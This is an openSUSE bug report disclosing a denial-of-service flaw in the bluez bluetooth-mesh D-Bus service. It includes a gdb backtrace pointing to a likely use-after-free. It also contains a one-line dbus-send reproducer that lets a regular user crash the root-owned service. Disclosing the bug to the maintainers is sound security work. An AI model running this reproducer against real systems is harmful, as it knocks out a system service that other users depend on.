Bug ID | 1152672 |
---|---|
Summary | VUL-0: bluez: bluetooth-mesh D-Bus service can be crashed by regular user |
Classification | openSUSE |
Product | openSUSE Tumbleweed |
Version | Current |
Hardware | Other |
OS | Other |
Status | NEW |
Severity | Normal |
Priority | P5 - None |
Component | Security |
Assignee | seife@novell.slipkontur.de |
Reporter | matthias.gerstner@suse.com |
QA Contact | qa-bugs@suse.de |
CC | matthias.gerstner@suse.com, vbotka@suse.com |
Blocks | 1151518 |
Found By | --- |
Blocker | --- |
+++ This bug was initially created as a clone of Bug #1151518 The new bluetooth-mesh D-Bus service which is reviewed in bug 1151518 has a DoS vulnerability that allows a regular user to crash the root owned D-Bus service. To do so the following D-Bus call can be employed: $ dbus-send --system --type=method_call --print-reply --dest=org.bluez.mesh /org/bluez/mesh org.bluez.mesh.Network1.Join objpath:/org/gnome/DisplayManager array:byte:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 After a timeout of about 20 seconds the D-Bus service will crash due to a null pointer dereference with the following backtrace: node_init_cb (node=0x0, agent=0x0) at mesh/mesh.c:359 359 reply = dbus_error(join_pending->msg, MESH_ERROR_FAILED, (gdb) bt user_data=0x5555555be170) at mesh/node.c:1760 dbus=<optimized out>) at ell/dbus.c:216 user_data=0x5555555a6e00) at ell/dbus.c:279 user_data=0x5555555a7ef0) at ell/io.c:126 at ell/main.c:642 at mesh/main.c:205 The reason is probably that the `join_pending` data structure has already been freed in a different function.